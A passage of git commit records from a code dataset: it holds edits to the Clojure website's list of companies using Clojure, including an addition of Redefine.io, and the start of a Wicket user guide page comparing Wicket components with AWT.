Health,opts=nofollow]\n* http:\/\/rentpath.com\/[RentPath,opts=nofollow]\n* http:\/\/jbrj.gov.br\/[Rio de Janeiro Botanical Garden,opts=nofollow]\n* http:\/\/rjmetrics.com\/[RJMetrics,opts=nofollow]\n* http:\/\/www.romr.com\/[R\u014dmr,opts=nofollow]\n* http:\/\/rocketfuel.com\/[Rocket Fuel,opts=nofollow]\n* https:\/\/rokt.com\/[ROKT,opts=nofollow]\n* http:\/\/www.roomkey.com\/[Room Key,opts=nofollow]\n* http:\/\/roomstorm.com\/[Roomstorm,opts=nofollow]\n* https:\/\/www.rowdylabs.com[Rowdy Labs,opts=nofollow]\n* http:\/\/roximity.com\/[ROXIMITY,opts=nofollow]\n* https:\/\/www.rts.ch\/info[RTS,opts=nofollow]\n* http:\/\/www.salesforce.com\/[Salesforce,opts=nofollow]\n* https:\/\/www.salliemae.com\/[Sallie Mae,opts=nofollow]\n* https:\/\/www.sap.com[SAP,opts=nofollow]\n* https:\/\/www.concur.com\/[SAP Concur,opts=nofollow]\n* http:\/\/www.twitter-fu.com\/[Sapiens Sapiens,opts=nofollow]\n* https:\/\/www.schibsted.com\/[Schibsted,opts=nofollow]\n* http:\/\/www.shareablee.com\/[Shareablee,opts=nofollow]\n* https:\/\/sharetribe.com\/[Sharetribe,opts=nofollow]\n* http:\/\/shore.li\/[shore.li,opts=nofollow]\n* http:\/\/www.signafire.com[Signafire,opts=nofollow]\n* http:\/\/signal.uk.com\/[Signal,opts=nofollow]\n* https:\/\/www.siili.com\/[Siili Solutions,opts=nofollow]\n* http:\/\/docs.svbplatform.com\/[Silicon Valley Bank,opts=nofollow]\n* http:\/\/silverline.mobi\/[Silverline Mobile,opts=nofollow]\n* http:\/\/www.silverpond.com.au\/[Silverpond,opts=nofollow]\n* https:\/\/www.simple.com\/[Simple,opts=nofollow]\n* https:\/\/www.simply.co.za[Simply,opts=nofollow]\n* http:\/\/www.sinapsi.com\/[Sinapsi,opts=nofollow]\n* http:\/\/us.sios.com\/[SIOS Technology Corp.,opts=nofollow]\n* https:\/\/sixsq.com\/[SixSq,opts=nofollow]\n* http:\/\/smilebooth.com\/[Smilebooth,opts=nofollow]\n* http:\/\/smxemail.com\/[SMX,opts=nofollow]\n* https:\/\/socialsuperstore.com\/[Social Superstore,opts=nofollow]\n* https:\/\/www.solita.fi\/[Solita,opts=nofollow]\n* https:\/\/soundcloud.com[Soundcloud,opts=nofollow]\n* https:\/\/www.soyoulearn.com\/[SoYouLearn,opts=nofollow]\n* https:\/\/www.sparkfund.co\/[SparkFund,opts=nofollow]\n* http:\/\/www.spinney.io\/[Spinney,opts=nofollow]\n* https:\/\/www.spotify.com[Spotify,opts=nofollow]\n* https:\/\/www.squarevenue.com[SquareVenue,opts=nofollow]\n* https:\/\/exchange.staples.com\/[Staples Exchange,opts=nofollow]\n* http:\/\/www.staples-sparx.com\/[Staples Sparx,opts=nofollow]\n* https:\/\/starcity.com\/careers[Starcity,opts=nofollow]\n* https:\/\/www.stardog.com\/[Stardog,opts=nofollow]\n* https:\/\/status.im\/[Status,opts=nofollow]\n* http:\/\/status.im[Status Research & Development GmbH,opts=nofollow]\n* https:\/\/www.stitchdata.com\/[Stitch,opts=nofollow]\n* http:\/\/structureddynamics.com\/[Structured Dynamics,opts=nofollow]\n* https:\/\/www.studio71.com\/us\/[Studio71,opts=nofollow]\n* http:\/\/www.studyflow.nl[Studyflow,opts=nofollow]\n* http:\/\/about.stylitics.com\/[Stylitics,opts=nofollow]\n* https:\/\/www.suiteness.com\/contact_us[Suiteness,opts=nofollow]\n* http:\/\/www.suprematic.net\/[Suprematic,opts=nofollow]\n* https:\/\/swiftkey.com\/[SwiftKey (Microsoft),opts=nofollow]\n* http:\/\/swirrl.com\/[Swirrl,opts=nofollow]\n* https:\/\/synple.eu\/en\/index[Synple,opts=nofollow]\n* http:\/\/www.synqrinus.com\/[Synqrinus,opts=nofollow]\n* https:\/\/www.taiste.com[Taiste,opts=nofollow]\n* https:\/\/takeoff.com[Takeoff Technologies,opts=nofollow]\n* http:\/\/talentads.net\/[TalentAds,opts=nofollow]\n* http:\/\/www.tappcommerce.com\/[Tapp Commerce,opts=nofollow]\n* https:\/\/www.tcgplayer.com\/[TCGplayer,opts=nofollow]\n* http:\/\/www.technoidentity.com\/[TechnoIdentity,opts=nofollow]\n* http:\/\/www.teradata.com[Teradata,opts=nofollow]\n* http:\/\/testdouble.com\/[Test Double,opts=nofollow]\n* https:\/\/climate.com\/[The Climate Corporation,opts=nofollow]\n* http:\/\/www.thinktopic.com\/[ThinkTopic,opts=nofollow]\n* https:\/\/github.com\/thinstripe[Thinstripe,opts=nofollow]\n* http:\/\/www.thoughtworks.com\/[ThoughtWorks,opts=nofollow]\n* http:\/\/www.threatgrid.com\/[ThreatGRID (acquired by Cisco),opts=nofollow]\n* https:\/\/www.todaqfinance.com\/[TODAQ Financial,opts=nofollow]\n* http:\/\/www.tokenmill.co\/[TokenMill,opts=nofollow]\n* https:\/\/www.tool2match.nl[Tool2Match,opts=nofollow]\n* https:\/\/www.topmonks.com\/[TopMonks,opts=nofollow]\n* https:\/\/touk.pl[TouK,opts=nofollow]\n* https:\/\/toyokumo.co.jp\/[TOYOKUMO,opts=nofollow]\n* https:\/\/www.thetrainline.com\/[Trainline,opts=nofollow]\n* https:\/\/trank.no\/[T-Rank,opts=nofollow]\n* http:\/\/www.trioptima.com\/[TriOptima,opts=nofollow]\n* https:\/\/www.troywest.com\/[Troy-West,opts=nofollow]\n* https:\/\/truckerpath.com[Trucker Path,opts=nofollow]\n* http:\/\/www.twosigma.com\/[Two Sigma,opts=nofollow]\n* https:\/\/www.ufst.dk[Udviklings- og forenklingsstyrelsen,opts=nofollow]\n* https:\/\/unacast.com\/[Unacast,opts=nofollow]\n* http:\/\/unbounce.com\/[Unbounce,opts=nofollow]\n* https:\/\/unfold.com\/[Unfold,opts=nofollow]\n* http:\/\/www.uhn.ca\/[University Health Network,opts=nofollow]\n* http:\/\/life.uni-leipzig.de[University Leipzig - Research Centre for Civilization Diseases (LIFE),opts=nofollow]\n* https:\/\/www.uplift.com[UpLift,opts=nofollow]\n* http:\/\/www.upworthy.com\/[Upworthy,opts=nofollow]\n* https:\/\/www.urbandictionary.com[Urban Dictionary,opts=nofollow]\n* http:\/\/ustream.tv\/[Ustream,opts=nofollow]\n* http:\/\/www.uswitch.com\/[uSwitch,opts=nofollow]\n* https:\/\/vakantiediscounter.nl[VakantieDiscounter,opts=nofollow]\n* http:\/\/veltio.com.br[Veltio,opts=nofollow]\n* https:\/\/www.verypossible.com[Very,opts=nofollow]\n* https:\/\/verybigthings.com[VeryBigThings,opts=nofollow]\n* https:\/\/vetd.com[Vetd,opts=nofollow]\n* https:\/\/viasat.com\/[Viasat,opts=nofollow]\n* http:\/\/vigiglobe.com\/[Vigiglobe,opts=nofollow]\n* https:\/\/www.vilect.ai\/[Vilect,opts=nofollow]\n* https:\/\/storrito.com[Vire,opts=nofollow]\n* https:\/\/www.virool.com\/[Virool,opts=nofollow]\n* http:\/\/vitallabs.co\/[Vital Labs,opts=nofollow]\n* https:\/\/www.vodori.com[Vodori,opts=nofollow]\n* http:\/\/www.walmartlabs.com\/[Walmart Labs,opts=nofollow]\n* https:\/\/weave.fi\/[Weave,opts=nofollow]\n* http:\/\/wefarm.org[WeFarm,opts=nofollow]\n* https:\/\/weshop.co.uk[WeShop,opts=nofollow]\n* https:\/\/www.whibse.com[Whibse,opts=nofollow]\n* https:\/\/pro.whitepages.com\/[Whitepages,opts=nofollow]\n* http:\/\/wikidocs.com\/[Wikidocs (acquired by Atlassian),opts=nofollow]\n* http:\/\/wildbit.com\/[Wildbit,opts=nofollow]\n* http:\/\/wit.ai[Wit.ai (acquired by Facebook),opts=nofollow]\n* https:\/\/work.co[Work & Co,opts=nofollow]\n* https:\/\/work.co\/[work.co,opts=nofollow]\n* https:\/\/workframe.com\/[Workframe,opts=nofollow]\n* http:\/\/www.workinvoice.it\/[Workinvoice,opts=nofollow]\n* https:\/\/www.works-hub.com[WorksHub,opts=nofollow]\n* https:\/\/worldsinglesnetworks.com\/[World Singles Networks,opts=nofollow]\n* https:\/\/www.xapix.io\/[Xapix GmbH,opts=nofollow]\n* https:\/\/xcoo.jp\/[Xcoo Inc.,opts=nofollow]\n* http:\/\/xnlogic.com[XN Logic,opts=nofollow]\n* http:\/\/yellerapp.com\/[Yeller,opts=nofollow]\n* http:\/\/yetanalytics.com\/[Yet Analytics,opts=nofollow]\n* http:\/\/www.yieldbot.com[Yieldbot,opts=nofollow]\n* http:\/\/yousee.dk\/[Yousee IT Innovation Labs,opts=nofollow]\n* https:\/\/www.youview.com\/[YouView,opts=nofollow]\n* http:\/\/www.yummly.com\/[Yummly,opts=nofollow]\n* http:\/\/www.yuppiechef.com\/[Yuppiechef,opts=nofollow]\n* http:\/\/tech.zalando.com[Zalando,opts=nofollow]\n* http:\/\/www.zendesk.com[Zendesk,opts=nofollow]\n* https:\/\/www.zenfinance.com.br\/[Zen Finance,opts=nofollow]\n* https:\/\/ilovezoona.com\/[Zoona,opts=nofollow]\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9044f83a85f4ee0665e140059e2f71cbc69d72a6","subject":"adding Redefine.io","message":"adding Redefine.io","repos":"clojure\/clojure-site","old_file":"content\/community\/companies.adoc","new_file":"content\/community\/companies.adoc","new_contents":"= Companies\nAlex Miller\n2017-03-15\n:type: community\n:toc: macro\n:icons: font\n\nBelow is a partial list of some companies using Clojure or ClojureScript. Most of this information comes from direct contacts, presentations, or other online resources. If you would like to be added or removed from this list, please contact __clojure@cognitect.com__ or submit a pull request to the https:\/\/github.com\/clojure\/clojure-site[site repository].\n\nAlso, check out the <<success_stories#,Clojure Success Stories>> and <<community_stories#,Community Stories>> pages!\n\n* 3e.eu\n* 8th Light\n* aclaimant\n* Active Group GmbH\n* Adaptly\n* AdGoji\n* Adobe\n* AdStage\n* Advance Auto Parts\n* Adzerk\n* AGA\n* AgentsMutual\/OnTheMarket\n* Agiliway\n* Airloyal\n* Ajira\n* Akamai\n* Akvo Foundation\n* Amazon\n* Amperity\n* Animalia\n* Annadale Technologies\n* Answers.com\n* Anywhere.com\n* Apex Data Solutions\n* Apple\n* AppsFlyer\n* AppSmiths\n* Appsnsites\n* Arc Studio Pro\n* Ardoq\n* ATA LLC\n* Atomist\n* Attendify\n* Audience Republic\n* Australia Post\n* Autheos\n* BandSquare\n* Banzai\n* baresquare\n* Barracuda\n* BaseFEX\n* Beanstalk\n* Beary Innovative\n* BeOpinion\n* bevuta\n* BGPworks\n* BillFront\n* BIMwelt Systems\n* Bloom\n* Blumbird GmbH\n* BookWell\n* Boundless Geo\n* Brainsfeed\n* Braintree Payments (acquired by PayPal)\n* Breeze EHR\n* BrickAlloy\n* Brightin\n* BroadbandUK\n* BroadPeak\n* Buddy\n* BUGS Bioscience\n* Buy Happy\n* buzzlers.com\n* CambioScience\n* Cambium Consulting\n* Capital One\n* cardforcoin\n* Carousel Apps\n* Cars.co.za\n* carwow\n* CA Technologies\n* Cellusys\n* Centriq\n* CENX\n* Cerner\n* Cervest Ltd.\n* CFPB (Credit Financial Protection Bureau)\n* Chariot Solutions\n* Chartbeat\n* Cicayda\n* CircleCI\n* Cisco\n* Citi\n* ClanHR\n* ClearCoin\n* Climate Corp (acquired by Monsanto)\n* Clockworks\n* CloudGears\n* CloudRepo\n* Clubhouse\n* Code54\n* codecentric\n* Co(de)factory\n* CodeScene\n* Codurance\n* Cognician\n* Cognitect\n* CollBox\n* Collective Digital Studio\n* Commonwealth Robotics\n* Commsor\n* Compute Software\n* Condense\n* Consumer Reports\n* CREATE.21st century\n* Crossbeam\n* Crossref\n* CROWD\n* Cryptowerk\n* Curbside\n* Cycloid\n* CyCognito\n* Daily Mail MailOnline\n* Database Labs\n* Datacraft\n* DataSnap.io\n* Datomic\n* DBS Bank\n* Debreuck Neirynck (DN)\n* Deep Impact\n* Degree9\n* Democracy Works\n* Deps\n* Designedly\n* Deutsche Bank\n* Devatics\n* Dewise\n* Diagnosia\n* Discendum ltd\n* Dividend Finance\n* DocSolver\n* Doctor Evidence\n* Doctronic\n* DOV-E\n* dploy.io\n* Dream to Learn\n* DRW Trading Group\n* Dyne.org\n* eBay\n* Ekata\n* Element 84\n* Empear\n* English Language iTutoring\n* Enterlab\n* Entrepreneur First\n* Event Fabric\n* Eventum\n* Evolta\n* Exoscale\n* Eyeota\n* Facebook\n* Facjure\n* Factual\n* FarBetter\n* Fierce.\n* Finalist\n* Finity AI\n* Flexiana\n* Flocktory\n* Flowa\n* Flybot\n* FORMCEPT\n* Framed Data\n* Freshcode\n* FullContact\n* Functional Works\n* Funding Circle\n* Futurice\n* Fy!\n* Gaiwan\n* GetContented\n* GetSet\n* Gmaven\n* GoCatch\n* Gofore\n* Goizper Group\n* GO-JEK\n* GoldFynch\n* Goodhertz\n* GoOpti\n* Gracenote\n* Grammarly\n* greenlabs\n* GreenPowerMonitor\n* Groupon\n* Guaranteed Rate\n* handcheque\n* HappyMoney\n* Hashrocket\n* healthfinch\n* HealthSamurai\n* Helpshift\n* Hendrick Automotive Group\n* Hero Marketing\n* Heroku\n* Hexawise\n* #Homescreen\n* Huobi Global\n* IB5k\n* ICM Consulting\n* IG\n* Imatic\n* Immute\n* Indaba Music\n* InnoQ\n* Inspire Fitness\n* instadeq\n* Intent Media\n* InterWare\n* Intropica\n* Intuit\n* iPlant Collaborative\n* IPRally Technologies\n* IRIS.TV\n* J.Crew\n* JESI\n* JustOn GmbH\n* JUXT\n* Kane LPI\n* Kasta\n* Kepler 16\n* Kira\n* Klarna\n* Kleene.ai\n* Knowledge E\n* Kodemaker\n* Kwelia\n* Ladder\n* Ladders\n* LambdaWerk\n* Latacora\n* Leancloud.cn\n* Leanheat\n* Lemmings\n* LemonPI\n* LendUp\n* Level Money\n* Lifebooker\n* Liftoff\n* LightMesh\n* Likely\n* LINE\n* LinguaTrip\n* Linkfluence\n* Listora\n* LiveOps\n* LivingSocial\n* Localize.city\n* Locarise\n* Logic Soft Pvt. Ltd.\n* LonoCloud (acquired by ViaSat)\n* LookingGlass Cyber Solutions\n* Loway\n* Lucid IT Consulting LLC\n* Lumanu\n* Luminare\n* LunchBox Sessions\n* Macrofex\n* MACROFEX LLC\n* Madriska Inc.\n* Magnet\n* Main Street Genome\n* Makimo\n* Marktbauer\/Comida da gente\n* Mastodon C\n* Mayvenn\n* Mazira\n* Mediquest\n* MeeWee\n* Merantix\n* Metabase\n* Metail\n* Metosin\n* Minoro\n* Mixpanel\n* MixRadio\n* Mobot\n* modelogiq\n* Moleque de Ideias\n* Motiva AI\n* MoveNation\n* Multis\n* Mysema\n* nemCV.com\n* Netflix\n* Neustar\n* nexonit.com\n* NextAngles\n* Nextjournal\n* nilenso\n* Nitor\n* NLG\n* NomNom Insights\n* Norled\n* NowMedia Tech\n* NSD - Norwegian Centre for Research Data\n* Nubank\n* Nukomeet\n* Numerical Brass Computing\n* Obrizum Group Ltd.\n* Oche Dart\n* Oiiku\n* OkLetsPlay\n* Omnyway Inc\n* Ona\n* Onfido\n* OnlineCasinoInformatie\n* OnTheMarket\n* OpenCompany\n* OpenSensors.io\n* OpenTable\n* Oracle\n* OrgSync\n* Orkli\n* Oscaro\n* Otto\n* OurHub\n* Outpace\n* Outpost Games\n* Owsy\n* Oyster Lab by Alpiq\n* PaddleGuru\n* Panacea Systems\n* Pandora\n* paper.li\n* ParcelBright\n* PartsBox\n* PassivSystems\n* Path\n* PayGarden\n* PayGo\n* Payoff\n* PennyMac\n* Pilloxa\n* Pisano\n* Pitch\n* Pivotal Labs\n* PKC\n* Point Slope\n* Pol.is\n* Postmark\n* PractiTest\n* Precursor\n* Premium Business Consultants BV\n* Prime.vc\n* Print.IO\n* projectmaterials.com\n* Projexsys\n* ProtoPie\n* Publizr\n* Puppet Labs\n* PurposeFly\n* Quartet Health\n* Quintype\n* Qvantel\n* Radiant Labs\n* RADIOactive\n* Reaktor\n* Red Hat\n* Red Pineapple Media\n* Redefine.io\n* Reify Health\n* RentPath\n* Ride Health\n* Rio de Janeiro Botanical Garden\n* RJMetrics\n* R\u014dmr\n* Roam Research\n* Rocket Fuel\n* ROKT\n* Room Key\n* Roomstorm\n* Rowdy Labs\n* ROXIMITY\n* RTS\n* Salesforce\n* Sallie Mae\n* SAP\n* SAP Concur\n* Sapiens Sapiens\n* Schibsted\n* SEB (Skandinaviska Enskilda Banken)\n* Shareablee\n* Sharetribe\n* shore.li\n* Signafire\n* Signal\n* Siili Solutions\n* Silicon Valley Bank\n* Silverline Mobile\n* Silverpond\n* Simple\n* Simply\n* Sinapsi\n* SIOS Technology Corp.\n* SixSq\n* Skipp\n* Smilebooth\n* SMX\n* Social Superstore\n* Solita\n* Soundcloud\n* SoYouLearn\n* SparkFund\n* Spatial Informatics Group\n* Spinney\n* Splash Financial\n* Spotify\n* SquareVenue\n* Staples Exchange\n* Staples Sparx\n* Starcity\n* Stardog\n* Status\n* Status Research & Development GmbH\n* Stitch\n* StreetLinx (acquired by Symphony)\n* Structured Dynamics\n* Studio71\n* Studyflow\n* Stylitics\n* Suiteness\n* Suprematic\n* SwiftKey (Microsoft)\n* Swirrl\n* Swym\n* Synple\n* Synqrinus\n* Taiste\n* Takeoff Technologies\n* TalentAds\n* Tapp Commerce\n* TCGplayer\n* TechnoIdentity\n* Teradata\n* Test Double\n* The Climate Corporation\n* ThinkTopic\n* Thinstripe\n* ThoughtWorks\n* ThreatGRID (acquired by Cisco)\n* TODAQ Financial\n* TokenMill\n* Tool2Match\n* TopMonks\n* TouK\n* TOYOKUMO\n* Trainline\n* T-Rank\n* Treasury Prime\n* TriOptima\n* Troy-West\n* Trucker Path\n* Two Sigma\n* Udviklings- og forenklingsstyrelsen\n* Unacast\n* Unbounce\n* Unfold\n* University Health Network\n* University Leipzig - Research Centre for Civilization Diseases (LIFE)\n* UpLift\n* Upworthy\n* Urban Dictionary\n* Ustream\n* uSwitch\n* VakantieDiscounter\n* Veltio\n* Very\n* VeryBigThings\n* Vetd\n* Verrency\n* Viasat\n* Vigiglobe\n* Vilect\n* Vire\n* Virool\n* Vital Labs\n* Vodori\n* Walmart Labs\n* Weave\n* WeFarm\n* WeShop\n* Whibse\n* Whimsical\n* Whitepages\n* Wikidocs (acquired by Atlassian)\n* Wildbit\n* Wit.ai (acquired by Facebook)\n* Work & Co\n* work.co\n* Workframe\n* Workinvoice\n* WorksHub\n* World Singles Networks\n* Xapix GmbH\n* Xcoo Inc.\n* XN Logic\n* Yeller\n* Yet Analytics\n* Yieldbot\n* Yousee IT Innovation Labs\n* YouView\n* Yummly\n* Yuppiechef\n* Zalando\n* Zendesk\n* Zen Finance\n* Zoona\n","old_contents":"= Companies\nAlex Miller\n2017-03-15\n:type: community\n:toc: macro\n:icons: font\n\nBelow is a partial list of some companies using Clojure or ClojureScript. Most of this information comes from direct contacts, presentations, or other online resources. If you would like to be added or removed from this list, please contact __clojure@cognitect.com__ or submit a pull request to the https:\/\/github.com\/clojure\/clojure-site[site repository].\n\nAlso, check out the <<success_stories#,Clojure Success Stories>> and <<community_stories#,Community Stories>> pages!\n\n* 3e.eu\n* 8th Light\n* aclaimant\n* Active Group GmbH\n* Adaptly\n* AdGoji\n* Adobe\n* AdStage\n* Advance Auto Parts\n* Adzerk\n* AGA\n* AgentsMutual\/OnTheMarket\n* Agiliway\n* Airloyal\n* Ajira\n* Akamai\n* Akvo Foundation\n* Amazon\n* Amperity\n* Animalia\n* Annadale Technologies\n* Answers.com\n* Anywhere.com\n* Apex Data Solutions\n* Apple\n* AppsFlyer\n* AppSmiths\n* Appsnsites\n* Arc Studio Pro\n* Ardoq\n* ATA LLC\n* Atomist\n* Attendify\n* Audience Republic\n* Australia Post\n* Autheos\n* BandSquare\n* Banzai\n* baresquare\n* Barracuda\n* BaseFEX\n* Beanstalk\n* Beary Innovative\n* BeOpinion\n* bevuta\n* BGPworks\n* BillFront\n* BIMwelt Systems\n* Bloom\n* Blumbird GmbH\n* BookWell\n* Boundless Geo\n* Brainsfeed\n* Braintree Payments (acquired by PayPal)\n* Breeze EHR\n* BrickAlloy\n* Brightin\n* BroadbandUK\n* BroadPeak\n* Buddy\n* BUGS Bioscience\n* Buy Happy\n* buzzlers.com\n* CambioScience\n* Cambium Consulting\n* Capital One\n* cardforcoin\n* Carousel Apps\n* Cars.co.za\n* carwow\n* CA Technologies\n* Cellusys\n* Centriq\n* CENX\n* Cerner\n* Cervest Ltd.\n* CFPB (Credit Financial Protection Bureau)\n* Chariot Solutions\n* Chartbeat\n* Cicayda\n* CircleCI\n* Cisco\n* Citi\n* ClanHR\n* ClearCoin\n* Climate Corp (acquired by Monsanto)\n* Clockworks\n* CloudGears\n* CloudRepo\n* Clubhouse\n* Code54\n* codecentric\n* Co(de)factory\n* CodeScene\n* Codurance\n* Cognician\n* Cognitect\n* CollBox\n* Collective Digital Studio\n* Commonwealth Robotics\n* Commsor\n* Compute Software\n* Condense\n* Consumer Reports\n* CREATE.21st century\n* Crossbeam\n* Crossref\n* CROWD\n* Cryptowerk\n* Curbside\n* Cycloid\n* CyCognito\n* Daily Mail MailOnline\n* Database Labs\n* Datacraft\n* DataSnap.io\n* Datomic\n* DBS Bank\n* Debreuck Neirynck (DN)\n* Deep Impact\n* Degree9\n* Democracy Works\n* Deps\n* Designedly\n* Deutsche Bank\n* Devatics\n* Dewise\n* Diagnosia\n* Discendum ltd\n* Dividend Finance\n* DocSolver\n* Doctor Evidence\n* Doctronic\n* DOV-E\n* dploy.io\n* Dream to Learn\n* DRW Trading Group\n* Dyne.org\n* eBay\n* Ekata\n* Element 84\n* Empear\n* English Language iTutoring\n* Enterlab\n* Entrepreneur First\n* Event Fabric\n* Eventum\n* Evolta\n* Exoscale\n* Eyeota\n* Facebook\n* Facjure\n* Factual\n* FarBetter\n* Fierce.\n* Finalist\n* Finity AI\n* Flexiana\n* Flocktory\n* Flowa\n* Flybot\n* FORMCEPT\n* Framed Data\n* Freshcode\n* FullContact\n* Functional Works\n* Funding Circle\n* Futurice\n* Fy!\n* Gaiwan\n* GetContented\n* GetSet\n* Gmaven\n* GoCatch\n* Gofore\n* Goizper Group\n* GO-JEK\n* GoldFynch\n* Goodhertz\n* GoOpti\n* Gracenote\n* Grammarly\n* greenlabs\n* GreenPowerMonitor\n* Groupon\n* Guaranteed Rate\n* handcheque\n* HappyMoney\n* Hashrocket\n* healthfinch\n* HealthSamurai\n* Helpshift\n* Hendrick Automotive Group\n* Hero Marketing\n* Heroku\n* Hexawise\n* #Homescreen\n* Huobi Global\n* IB5k\n* ICM Consulting\n* IG\n* Imatic\n* Immute\n* Indaba Music\n* InnoQ\n* Inspire Fitness\n* instadeq\n* Intent Media\n* InterWare\n* Intropica\n* Intuit\n* iPlant Collaborative\n* IPRally Technologies\n* IRIS.TV\n* J.Crew\n* JESI\n* JustOn GmbH\n* JUXT\n* Kane LPI\n* Kasta\n* Kepler 16\n* Kira\n* Klarna\n* Kleene.ai\n* Knowledge E\n* Kodemaker\n* Kwelia\n* Ladder\n* Ladders\n* LambdaWerk\n* Latacora\n* Leancloud.cn\n* Leanheat\n* Lemmings\n* LemonPI\n* LendUp\n* Level Money\n* Lifebooker\n* Liftoff\n* LightMesh\n* Likely\n* LINE\n* LinguaTrip\n* Linkfluence\n* Listora\n* LiveOps\n* LivingSocial\n* Localize.city\n* Locarise\n* Logic Soft Pvt. Ltd.\n* LonoCloud (acquired by ViaSat)\n* LookingGlass Cyber Solutions\n* Loway\n* Lucid IT Consulting LLC\n* Lumanu\n* Luminare\n* LunchBox Sessions\n* Macrofex\n* MACROFEX LLC\n* Madriska Inc.\n* Magnet\n* Main Street Genome\n* Makimo\n* Marktbauer\/Comida da gente\n* Mastodon C\n* Mayvenn\n* Mazira\n* Mediquest\n* MeeWee\n* Merantix\n* Metabase\n* Metail\n* Metosin\n* Minoro\n* Mixpanel\n* MixRadio\n* Mobot\n* modelogiq\n* Moleque de Ideias\n* Motiva AI\n* MoveNation\n* Multis\n* Mysema\n* nemCV.com\n* Netflix\n* Neustar\n* nexonit.com\n* NextAngles\n* Nextjournal\n* nilenso\n* Nitor\n* NLG\n* NomNom Insights\n* Norled\n* NowMedia Tech\n* NSD - Norwegian Centre for Research Data\n* Nubank\n* Nukomeet\n* Numerical Brass Computing\n* Obrizum Group Ltd.\n* Oche Dart\n* Oiiku\n* OkLetsPlay\n* Omnyway Inc\n* Ona\n* Onfido\n* OnlineCasinoInformatie\n* OnTheMarket\n* OpenCompany\n* OpenSensors.io\n* OpenTable\n* Oracle\n* OrgSync\n* Orkli\n* Oscaro\n* Otto\n* OurHub\n* Outpace\n* Outpost Games\n* Owsy\n* Oyster Lab by Alpiq\n* PaddleGuru\n* Panacea Systems\n* Pandora\n* paper.li\n* ParcelBright\n* PartsBox\n* PassivSystems\n* Path\n* PayGarden\n* PayGo\n* Payoff\n* PennyMac\n* Pilloxa\n* Pisano\n* Pitch\n* Pivotal Labs\n* PKC\n* Point Slope\n* Pol.is\n* Postmark\n* PractiTest\n* Precursor\n* Premium Business Consultants BV\n* Prime.vc\n* Print.IO\n* projectmaterials.com\n* Projexsys\n* ProtoPie\n* Publizr\n* Puppet Labs\n* PurposeFly\n* Quartet Health\n* Quintype\n* Qvantel\n* Radiant Labs\n* RADIOactive\n* Reaktor\n* Red Hat\n* Red Pineapple Media\n* Reify Health\n* RentPath\n* Ride Health\n* Rio de Janeiro Botanical Garden\n* RJMetrics\n* R\u014dmr\n* Roam Research\n* Rocket Fuel\n* ROKT\n* Room Key\n* Roomstorm\n* Rowdy Labs\n* ROXIMITY\n* RTS\n* Salesforce\n* Sallie Mae\n* SAP\n* SAP Concur\n* Sapiens Sapiens\n* Schibsted\n* SEB (Skandinaviska Enskilda Banken)\n* Shareablee\n* Sharetribe\n* shore.li\n* Signafire\n* Signal\n* Siili Solutions\n* Silicon Valley Bank\n* Silverline Mobile\n* Silverpond\n* Simple\n* Simply\n* Sinapsi\n* SIOS Technology Corp.\n* SixSq\n* Skipp\n* Smilebooth\n* SMX\n* Social Superstore\n* Solita\n* Soundcloud\n* SoYouLearn\n* SparkFund\n* Spatial Informatics Group\n* Spinney\n* Splash Financial\n* Spotify\n* SquareVenue\n* Staples Exchange\n* Staples Sparx\n* Starcity\n* Stardog\n* Status\n* Status Research & Development GmbH\n* Stitch\n* StreetLinx (acquired by Symphony)\n* Structured Dynamics\n* Studio71\n* Studyflow\n* Stylitics\n* Suiteness\n* Suprematic\n* SwiftKey (Microsoft)\n* Swirrl\n* Swym\n* Synple\n* Synqrinus\n* Taiste\n* Takeoff Technologies\n* TalentAds\n* Tapp Commerce\n* TCGplayer\n* TechnoIdentity\n* Teradata\n* Test Double\n* The Climate Corporation\n* ThinkTopic\n* Thinstripe\n* ThoughtWorks\n* ThreatGRID (acquired by Cisco)\n* TODAQ Financial\n* TokenMill\n* Tool2Match\n* TopMonks\n* TouK\n* TOYOKUMO\n* Trainline\n* T-Rank\n* Treasury Prime\n* TriOptima\n* Troy-West\n* Trucker Path\n* Two Sigma\n* Udviklings- og forenklingsstyrelsen\n* Unacast\n* Unbounce\n* Unfold\n* University Health Network\n* University Leipzig - Research Centre for Civilization Diseases (LIFE)\n* UpLift\n* Upworthy\n* Urban Dictionary\n* Ustream\n* uSwitch\n* VakantieDiscounter\n* Veltio\n* Very\n* VeryBigThings\n* Vetd\n* Verrency\n* Viasat\n* Vigiglobe\n* Vilect\n* Vire\n* Virool\n* Vital Labs\n* Vodori\n* Walmart Labs\n* Weave\n* WeFarm\n* WeShop\n* Whibse\n* Whimsical\n* Whitepages\n* Wikidocs (acquired by Atlassian)\n* Wildbit\n* Wit.ai (acquired by Facebook)\n* Work & Co\n* work.co\n* Workframe\n* Workinvoice\n* WorksHub\n* World Singles Networks\n* Xapix GmbH\n* Xcoo Inc.\n* XN Logic\n* Yeller\n* Yet Analytics\n* Yieldbot\n* Yousee IT Innovation Labs\n* YouView\n* Yummly\n* Yuppiechef\n* Zalando\n* Zendesk\n* Zen Finance\n* Zoona\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"066a44c83ae682a8b8c7b202eeda968cdc424178","subject":"Removed staruml as it's not used","message":"Removed staruml as it's not used\n","repos":"mosoft521\/wicket,apache\/wicket,apache\/wicket,mosoft521\/wicket,apache\/wicket,apache\/wicket,apache\/wicket,mosoft521\/wicket,mosoft521\/wicket,mosoft521\/wicket","old_file":"wicket-user-guide\/src\/main\/asciidoc\/helloWorld.adoc","new_file":"wicket-user-guide\/src\/main\/asciidoc\/helloWorld.adoc","new_contents":"\nWicket allows us to design our web pages in terms of components and containers, just like AWT does with desktop windows. \nBoth frameworks share the same component-based architecture: in AWT we have a _Windows_ instance which represents the physical windows containing GUI components (like text fields, radio buttons, drawing areas, etc...), in Wicket we have a _WebPage_ instance which represents the physical web page containing HTML components (pictures, buttons, forms, etc... ) .\n\nimage::..\/img\/uml-component.png[]\n\nIn both frameworks we find a base class for GUI components called _Component_. Wicket pages can be composed (and usually are) by many components, just like AWT windows are composed by Swing\/AWT components. Both frameworks promote the reuse of presentation code and GUI elements building custom components. Even if Wicket already comes with a rich set of ready-to-use components, building custom components is a common practice when working with this framework. We'll learn more about custom components in the next chapters.\n\n","old_contents":"\nWicket allows us to design our web pages in terms of components and containers, just like AWT does with desktop windows. \nBoth frameworks share the same component-based architecture: in AWT we have a _Windows_ instance which represents the physical windows containing GUI components (like text fields, radio buttons, drawing areas, etc...), in Wicket we have a _WebPage_ instance which represents the physical web page containing HTML components (pictures, buttons, forms, etc... ) 